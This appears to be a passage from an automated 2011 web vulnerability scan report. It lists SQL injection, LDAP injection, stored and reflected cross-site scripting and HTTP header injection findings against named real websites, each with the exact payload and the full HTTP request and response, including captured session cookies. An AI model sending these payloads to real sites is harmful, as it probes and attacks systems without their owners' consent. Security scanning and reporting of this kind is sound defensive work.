Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load'waitfor%20delay'0%3a0%3a20'--; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:52:53 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fPromCode%3d571423&PromCode=571423
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 219

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fPromCode%3d571423&amp;PromCode=571423">here</a>.</h2
...[SNIP]...

1.18. http://west.thomson.com/store/secure/ShoppingBasket.aspx [s_id cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The s_id cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the s_id cookie. The application took 53423 milliseconds to respond to the request, compared with 10937 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn')waitfor%20delay'0%3a0%3a20'--; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=A2B8589473CF8FC8B84582EDCCA18DA921C9607FD66A72923489A9D520F1A72DC25C5881F2C4299AFEC4F650329ED4D92FDB7810CCF374D8369FE4C447608C1AFF940455236DD8C534F6DDF5D9575CABE558EAEAC107A418E22F703D34308342D11D90AB828F7BFA1961EF59A3B04676FA38F27153203526720F64014AAF6FD2BDBA490CBE6FD194CC05A5B2612403A475A4ECE05807201D3CAEBB3AA82896D25B6F9D8910E1764008977756F0D348920ACDA8AA90BA295110ACD3D7783F9EE8463371CE85B2638990312C407C601E69F97C32BD90BA2EC5DFD202985E1A9741F53BA94F

Response (redirected)

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:46:57 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26CartContents%3d22061301%253b%26PromCode%3d600582C43552%26PromType%3dinternal&CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 431

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fCartEventsAndParams%3dscAdd%253a%2b22061301%253b%26C
...[SNIP]...

1.19. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.computerworld.com
Path:   /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.computerworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
piExres: Tue, 26 Apr 2011 22:10:48 GMT
nnCoection: close
Cheac-Control: private
ETag: "KXAOEEJGPLUXVQPYV"
Vary: Accept-Encoding
Cache-Control: public, max-age=545
Expires: Tue, 26 Apr 2011 22:10:04 GMT
Date: Tue, 26 Apr 2011 22:00:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/ParAccel.png" width="50" border="0" alt="Tackle the Most Challenging Analytic Queries" /></div>
<div class="text">
   <div class="label">WHITE PAPER</div>
       <div class="title"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="
http://resources.computerworld.com/show/200001013/00073050014183CTWIOIYR5H21H/?email=%%emailaddr%%">Tackle the Most Challenging Analytic Queries</a></div>
       <div class="summary">Tackle the most complex analytic challenges and glean insight from vast amounts of data. Learn how a columnar-based, massively parallel processing analytic database can provide high performance analytics against complex SQL workloads the most challenging analytic queries.</div>
<p style="margin:8px 0 0 0;"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="
http://resources.computerworld.com/show/200001013/00073050014183CTWIOIYR5H21H/?email=%%emailaddr%%">Read now.</a></p>
</div>
</div>
<div class="item">
   <div class="image"><img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/ibmcwfirehose.png" width="50" border="0" alt="Deploying Cost-Effective Data Centers" /></div>
<div class="text">
   <div class="label">WHITE PAPER</div>
       <div class="title"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="
http://solutioncenters.computerworld.com/ibm_government/registration/4364.html?source=00038860006213CTW922SDDEL5Z__ctw&SOURCE=00038860006213CTW922SDDEL5Z&emailAddress=%%emailaddr%%">Deploying Cost-Effective Data Centers</a></div>
       <div class="summary">Innovation matters - learn how to rapidly deploying cost-effective, energy-efficient data centers. Click here to find out more! </div>

...[SNIP]...

Request 2

GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.computerworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
piExres: Tue, 26 Apr 2011 22:11:02 GMT
nnCoection: close
Cheac-Control: private
ETag: "KXAOEEJGPLTMVQPYV"
Vary: Accept-Encoding
Cache-Control: public, max-age=581
Expires: Tue, 26 Apr 2011 22:10:46 GMT
Date: Tue, 26 Apr 2011 22:01:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/integrated-app-to-disk50x37.jpg" width="50" border="0" alt="Integrated Application-to-Disk Management" /></div>
<div class="text">
<div class="label">WEBCAST</div>
<div class="title"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="http://resources.computerworld.com/show/200000301/00137940016403CTWXO4OAP0I7V/?email=%%emailaddr%%">Integrated Application-to-Disk Management </a></div>
<div class="summary">Eliminate disparate tools and maximize return on your software and hardware investments.</div>
<p style="margin:8px 0 0 0;"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="http://resources.computerworld.com/show/200000301/00137940016403CTWXO4OAP0I7V/?email=%%emailaddr%%">Learn more.</a></p>
</div>
</div>
<div class="item">
<div class="image"><img src="http://computerworld.com.edgesuite.net/brightcove_test/resources-strip/ibmcwfirehose.png" width="50" border="0" alt="Deploying Cost-Effective Data Centers" /></div>
<div class="text">
<div class="label">WHITE PAPER</div>
<div class="title"><a onclick="LeadGen.Tracking.addSourceCode('ctwtsr','ar', this);return false;" href="http://solutioncenters.computerworld.com/ibm_government/registration/4364.html?source=00038860006213CTW922SDDEL5Z__ctw&SOURCE=00038860006213CTW922SDDEL5Z&emailAddress=%%emailaddr%%" class="title">Deploying Cost-Effective Data Centers</a></div>
<div class="summary">Innovation matters - learn how to rapidly deploying cost-effective, energy-efficient data centers. Click here to find out more! </div>
<p style="margin:8px 0 0
...[SNIP]...

2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 2fda59a1d239f5ba)(sn=* and 2fda59a1d239f5ba)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=2fda59a1d239f5ba)(sn=*&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2fda59a1d239f5ba&#41;&#40;sn=exp=1&initExp=Tue Apr 26 18:36:18 2011&recExp=Tue Apr 26 18:36:18 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842978; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=2fda59a1d239f5ba)!(sn=*&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2fda59a1d239f5ba&#41;!&#40;sn=exp=1&initExp=Tue Apr 26 18:36:18 2011&recExp=Tue Apr 26 18:36:18 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842978; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3. Cross-site scripting (stored)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //account.do

Issue detail

The value of the email request parameter submitted to the URL /create-account-submit.do is copied into the HTML document as plain text between tags at the URL //account.do. The payload 2559e<script>alert(1)</script>8523ef6493d was submitted in the email parameter. This input was returned unmodified in a subsequent request for the URL //account.do.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

POST /create-account-submit.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
Origin: https://ecommerce.randomhouse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1
Content-Length: 274

shippingAddress=useBillingAddress&email=%27%40%27.com2559e<script>alert(1)</script>8523ef6493d&firstName=llkk+kkk&lastName=kkk+&company=&street1=123+mmm+st+&street2=&city=new+york&stateProvince=NY&country=US&zipPostalCode=10010&phoneNumber=999-988-0987&faxNumber=&password=1234rf&confirmPasswor
...[SNIP]...

Request 2

GET //account.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:50:34 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17132


<!-- account.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...
<span class="loggedInText">'@'.com2559e<script>alert(1)</script>8523ef6493d</span>
...[SNIP]...

4. HTTP header injection  previous  next
There are 4 instances of this issue:


4.1. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/new.computerworlduk.com/security1

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d4c5%0d%0a27bb07a4caf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d4c5%0d%0a27bb07a4caf/new.computerworlduk.com/security1;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=2;ord=1303854538291? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8d4c5
27bb07a4caf
/new.computerworlduk.com/security1;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=2;ord=1303854538291:
Date: Tue, 26 Apr 2011 21:51:14 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/new.computerworlduk.com/security2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 95a76%0d%0a26ff575b102 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /95a76%0d%0a26ff575b102/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=3;ord=1303854538291? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/95a76
26ff575b102
/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=250x250,300x250,336x280;tile=3;ord=1303854538291:
Date: Tue, 26 Apr 2011 21:51:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://widgetserver.com/syndication/get_widget.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgetserver.com
Path:   /syndication/get_widget.js

Issue detail

The value of the callback request parameter is copied into the Location response header. The payload 8079d%0d%0a98a5ae34c96 was submitted in the callback parameter. This caused a response containing an injected HTTP header.

Request

GET /syndication/get_widget.js?callback=8079d%0d%0a98a5ae34c96&output=json&location=http%3A%2F%2Fwww.aac.org%2Fsite%2FTR%2FEvents%2FAWB08%3Fpg%3Dteam%26fr_id%3D1110%26team_id%3D24880&timestamp=1303854282405&appId.0=9dc88731-b2ec-4909-9bc6-b15b8881219b HTTP/1.1
Host: widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 21:44:34 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/?callback=8079d
98a5ae34c96

Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript
Content-Length: 0


4.4. http://www.widgetserver.com/syndication/get_widget.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetserver.com
Path:   /syndication/get_widget.js

Issue detail

The value of the callback request parameter is copied into the Location response header. The payload a292f%0d%0ad3fe71315d0 was submitted in the callback parameter. This caused a response containing an injected HTTP header.

Request

GET /syndication/get_widget.js?callback=a292f%0d%0ad3fe71315d0&output=json&location=http%3A%2F%2Fwww.widgetbox.com%2Flist%2Fmost_popular&timestamp=1303854385556&appId.0=077f25c8-0348-4215-9539-57b2ff17f13b HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 21:46:18 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/?callback=a292f
d3fe71315d0

Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript
Content-Length: 0


5. Cross-site scripting (reflected)  previous  next
There are 266 instances of this issue:


5.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [labels parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The value of the labels request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 139d0"-alert(1)-"6aa7e702a5c was submitted in the labels parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb139d0"-alert(1)-"6aa7e702a5c&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
